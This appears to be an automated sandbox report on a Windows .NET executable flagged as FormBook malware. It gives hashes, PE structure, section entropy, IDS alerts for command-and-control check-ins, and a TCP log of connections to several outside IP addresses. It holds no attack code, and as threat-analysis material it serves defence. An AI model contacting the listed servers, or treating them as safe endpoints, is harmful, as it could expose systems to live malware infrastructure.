SHA512:	12916ff54e52f890e731d64050f2f305e9a0e1a5a285783d72e967bd091e4e7592cc7fe99076fc7312920a5037af83b53b930a38e418018504bb7e083eee36ca
SSDEEP:	12288:/ndIR4R52J+Xt2ciGQ1ZU3Unpfe9gLT4AUlo2Ej9e0AvneFeKWB1t2tChG9CPeJ5:fdIeer1ZU3Upfe9gNrep/9MCPeMI
TLSH:	5805F19C7500B14FC953C5354E70FDB4AA682DAA970783139ADB2EEFBD1D896CE041E2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.Ng..............0......P......~+... ...@....@.. ....................................@................................

File Icon


Icon Hash:	033424c4c199d839

Static PE Info

General

Entrypoint:	0x4c2b7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x674EAA46 [Tue Dec 3 06:50:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2b2c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x4ca8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xca000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc0b84	0xc0c00	cf380bb8d5649bfc329073f8c5e36318	False	0.9091328226329443	data	7.783031316864853	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc4000	0x4ca8	0x4e00	0feac6fc8a8a3e1ec643530043fafee4	False	0.9410056089743589	data	7.768942946885642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xca000	0xc	0x200	fa8d51f6fab2e0987c3ef4e4a55a2853	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc4130	0x46f9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9932852661126094
RT_GROUP_ICON	0xc882c	0x14	data	1.05
RT_VERSION	0xc8840	0x278	data	0.46835443037974683
RT_MANIFEST	0xc8ab8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T05:04:46.506221+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49977	13.248.169.48	80	TCP
2025-01-11T05:04:48.009182+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49978	13.248.169.48	80	TCP
2025-01-11T05:04:50.545903+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49979	13.248.169.48	80	TCP
2025-01-11T05:04:58.746170+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49982	209.74.79.42	80	TCP
2025-01-11T05:05:01.293217+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49983	209.74.79.42	80	TCP
2025-01-11T05:05:03.815682+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49984	209.74.79.42	80	TCP
2025-01-11T05:05:13.082811+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49986	45.113.82.65	80	TCP
2025-01-11T05:05:15.616078+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49987	45.113.82.65	80	TCP
2025-01-11T05:05:18.191564+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49988	45.113.82.65	80	TCP
2025-01-11T05:05:26.350272+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49990	67.223.118.94	80	TCP
2025-01-11T05:05:28.930527+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49991	67.223.118.94	80	TCP
2025-01-11T05:05:31.431788+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49992	67.223.118.94	80	TCP
2025-01-11T05:05:40.063444+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49994	192.186.57.30	80	TCP
2025-01-11T05:05:42.618553+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49995	192.186.57.30	80	TCP
2025-01-11T05:05:45.180128+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49996	192.186.57.30	80	TCP
2025-01-11T05:05:54.271889+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49998	104.21.48.1	80	TCP
2025-01-11T05:05:56.818804+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49999	104.21.48.1	80	TCP
2025-01-11T05:05:59.365915+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50000	104.21.48.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:04:27.457930088 CET	49975	80	192.168.2.7	124.6.61.130
Jan 11, 2025 05:04:27.462882996 CET	80	49975	124.6.61.130	192.168.2.7
Jan 11, 2025 05:04:27.462992907 CET	49975	80	192.168.2.7	124.6.61.130
Jan 11, 2025 05:04:27.472893953 CET	49975	80	192.168.2.7	124.6.61.130
Jan 11, 2025 05:04:27.477819920 CET	80	49975	124.6.61.130	192.168.2.7
Jan 11, 2025 05:04:29.895133018 CET	80	49975	124.6.61.130	192.168.2.7
Jan 11, 2025 05:04:29.895229101 CET	80	49975	124.6.61.130	192.168.2.7
Jan 11, 2025 05:04:29.895711899 CET	49975	80	192.168.2.7	124.6.61.130
Jan 11, 2025 05:04:29.899211884 CET	49975	80	192.168.2.7	124.6.61.130
Jan 11, 2025 05:04:29.904047012 CET	80	49975	124.6.61.130	192.168.2.7
Jan 11, 2025 05:04:44.971607924 CET	49977	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:44.976459026 CET	80	49977	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:44.976639032 CET	49977	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:44.991425037 CET	49977	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:44.996421099 CET	80	49977	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:46.506221056 CET	49977	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:46.553195000 CET	80	49977	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:47.524794102 CET	49978	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:47.529725075 CET	80	49978	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:47.529824972 CET	49978	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:47.544393063 CET	49978	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:47.550348043 CET	80	49978	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:48.008999109 CET	80	49978	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:48.009110928 CET	80	49978	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:48.009181976 CET	49978	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:48.365236998 CET	80	49977	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:48.365328074 CET	49977	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:49.053127050 CET	49978	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:50.071731091 CET	49979	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:50.076611996 CET	80	49979	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:50.076709986 CET	49979	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:50.091137886 CET	49979	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:50.096107960 CET	80	49979	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:50.096122026 CET	80	49979	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:50.545738935 CET	80	49979	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:50.545761108 CET	80	49979	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:50.545902967 CET	49979	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:51.600703955 CET	49979	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:52.618755102 CET	49981	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:52.623712063 CET	80	49981	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:52.623862982 CET	49981	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:52.632966995 CET	49981	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:52.637907028 CET	80	49981	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:53.083744049 CET	80	49981	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:53.083764076 CET	80	49981	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:53.083924055 CET	49981	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:53.086673021 CET	49981	80	192.168.2.7	13.248.169.48
Jan 11, 2025 05:04:53.091515064 CET	80	49981	13.248.169.48	192.168.2.7
Jan 11, 2025 05:04:58.122672081 CET	49982	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:04:58.127516985 CET	80	49982	209.74.79.42	192.168.2.7
Jan 11, 2025 05:04:58.127619982 CET	49982	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:04:58.146409035 CET	49982	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:04:58.151206970 CET	80	49982	209.74.79.42	192.168.2.7
Jan 11, 2025 05:04:58.745940924 CET	80	49982	209.74.79.42	192.168.2.7
Jan 11, 2025 05:04:58.746090889 CET	80	49982	209.74.79.42	192.168.2.7
Jan 11, 2025 05:04:58.746170044 CET	49982	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:04:59.662456989 CET	49982	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:00.682684898 CET	49983	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:00.687509060 CET	80	49983	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:00.687582970 CET	49983	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:00.707967997 CET	49983	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:00.712899923 CET	80	49983	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:01.293032885 CET	80	49983	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:01.293123960 CET	80	49983	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:01.293216944 CET	49983	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:02.209345102 CET	49983	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:03.228039026 CET	49984	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:03.232899904 CET	80	49984	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:03.233009100 CET	49984	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:03.247458935 CET	49984	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:03.252393961 CET	80	49984	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:03.252487898 CET	80	49984	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:03.815442085 CET	80	49984	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:03.815629005 CET	80	49984	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:03.815681934 CET	49984	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:04.756208897 CET	49984	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:05.791477919 CET	49985	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:05.796260118 CET	80	49985	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:05.796355009 CET	49985	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:05.834855080 CET	49985	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:05.839709044 CET	80	49985	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:06.417193890 CET	80	49985	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:06.417314053 CET	80	49985	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:06.417366982 CET	49985	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:06.420041084 CET	49985	80	192.168.2.7	209.74.79.42
Jan 11, 2025 05:05:06.424849033 CET	80	49985	209.74.79.42	192.168.2.7
Jan 11, 2025 05:05:11.917613029 CET	49986	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:11.922499895 CET	80	49986	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:11.922595978 CET	49986	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:11.937406063 CET	49986	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:11.943269968 CET	80	49986	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:13.082554102 CET	80	49986	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:13.082762003 CET	80	49986	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:13.082811117 CET	49986	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:13.443813086 CET	49986	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:14.462590933 CET	49987	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:14.467458963 CET	80	49987	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:14.467551947 CET	49987	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:14.481859922 CET	49987	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:14.486738920 CET	80	49987	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:15.615912914 CET	80	49987	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:15.616014957 CET	80	49987	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:15.616077900 CET	49987	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:15.990628004 CET	49987	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:17.024504900 CET	49988	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:17.029345036 CET	80	49988	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:17.030039072 CET	49988	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:17.047185898 CET	49988	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:17.052119017 CET	80	49988	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:17.052207947 CET	80	49988	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:18.191391945 CET	80	49988	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:18.191416979 CET	80	49988	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:18.191564083 CET	49988	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:18.553261042 CET	49988	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:19.572098970 CET	49989	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:19.576956987 CET	80	49989	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:19.577202082 CET	49989	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:19.586208105 CET	49989	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:19.591094017 CET	80	49989	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:20.713006973 CET	80	49989	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:20.713035107 CET	80	49989	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:20.713481903 CET	49989	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:20.716137886 CET	49989	80	192.168.2.7	45.113.82.65
Jan 11, 2025 05:05:20.721020937 CET	80	49989	45.113.82.65	192.168.2.7
Jan 11, 2025 05:05:25.744610071 CET	49990	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:25.749449968 CET	80	49990	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:25.749521017 CET	49990	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:25.764002085 CET	49990	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:25.768827915 CET	80	49990	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:26.350210905 CET	80	49990	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:26.350234032 CET	80	49990	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:26.350265026 CET	80	49990	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:26.350271940 CET	49990	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:26.350301027 CET	49990	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:27.271889925 CET	49990	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:28.292952061 CET	49991	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:28.297832012 CET	80	49991	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:28.298027039 CET	49991	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:28.312503099 CET	49991	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:28.317276001 CET	80	49991	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:28.930388927 CET	80	49991	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:28.930468082 CET	80	49991	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:28.930480957 CET	80	49991	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:28.930526972 CET	49991	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:28.930526972 CET	49991	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:29.819039106 CET	49991	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:30.837886095 CET	49992	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:30.842905998 CET	80	49992	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:30.843046904 CET	49992	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:30.857801914 CET	49992	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:30.862782001 CET	80	49992	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:30.862912893 CET	80	49992	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:31.431603909 CET	80	49992	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:31.431648970 CET	80	49992	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:31.431687117 CET	80	49992	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:31.431787968 CET	49992	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:31.431926966 CET	49992	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:32.365658045 CET	49992	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:33.384469986 CET	49993	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:33.389547110 CET	80	49993	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:33.389656067 CET	49993	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:33.398827076 CET	49993	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:33.403609037 CET	80	49993	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:34.001019001 CET	80	49993	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:34.001040936 CET	80	49993	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:34.001066923 CET	80	49993	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:34.001290083 CET	49993	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:34.001290083 CET	49993	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:34.004359961 CET	49993	80	192.168.2.7	67.223.118.94
Jan 11, 2025 05:05:34.009265900 CET	80	49993	67.223.118.94	192.168.2.7
Jan 11, 2025 05:05:39.199233055 CET	49994	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:39.204128981 CET	80	49994	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:39.204190969 CET	49994	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:39.218615055 CET	49994	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:39.223464012 CET	80	49994	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:40.063213110 CET	80	49994	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:40.063391924 CET	80	49994	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:40.063443899 CET	49994	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:40.725049973 CET	49994	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:41.764194012 CET	49995	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:41.769081116 CET	80	49995	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:41.769351959 CET	49995	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:41.784327984 CET	49995	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:41.791296959 CET	80	49995	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:42.618367910 CET	80	49995	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:42.618486881 CET	80	49995	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:42.618552923 CET	49995	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:43.287724972 CET	49995	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:44.306143999 CET	49996	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:44.311014891 CET	80	49996	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:44.311108112 CET	49996	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:44.325512886 CET	49996	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:44.330351114 CET	80	49996	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:44.330502987 CET	80	49996	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:45.180033922 CET	80	49996	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:45.180063009 CET	80	49996	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:45.180128098 CET	49996	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:45.834361076 CET	49996	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:46.853334904 CET	49997	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:46.858160019 CET	80	49997	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:46.858283043 CET	49997	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:46.867834091 CET	49997	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:46.872644901 CET	80	49997	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:47.716093063 CET	80	49997	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:47.716603994 CET	80	49997	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:47.716764927 CET	49997	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:47.719196081 CET	49997	80	192.168.2.7	192.186.57.30
Jan 11, 2025 05:05:47.724021912 CET	80	49997	192.186.57.30	192.168.2.7
Jan 11, 2025 05:05:52.743884087 CET	49998	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:52.748792887 CET	80	49998	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:52.748887062 CET	49998	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:52.766237020 CET	49998	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:52.771125078 CET	80	49998	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:54.271888971 CET	49998	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:54.277060032 CET	80	49998	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:54.277132988 CET	49998	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:55.290704966 CET	49999	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:55.295557976 CET	80	49999	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:55.295670986 CET	49999	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:55.310228109 CET	49999	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:55.315030098 CET	80	49999	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:56.818804026 CET	49999	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:56.823795080 CET	80	49999	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:56.823895931 CET	49999	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:57.837806940 CET	50000	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:57.842741013 CET	80	50000	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:57.842813015 CET	50000	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:57.858961105 CET	50000	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:57.863753080 CET	80	50000	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:57.863868952 CET	80	50000	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:59.365915060 CET	50000	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:05:59.371066093 CET	80	50000	104.21.48.1	192.168.2.7
Jan 11, 2025 05:05:59.374417067 CET	50000	80	192.168.2.7	104.21.48.1
Jan 11, 2025 05:06:00.385765076 CET	50001	80	192.168.2.7	104.21.48.1
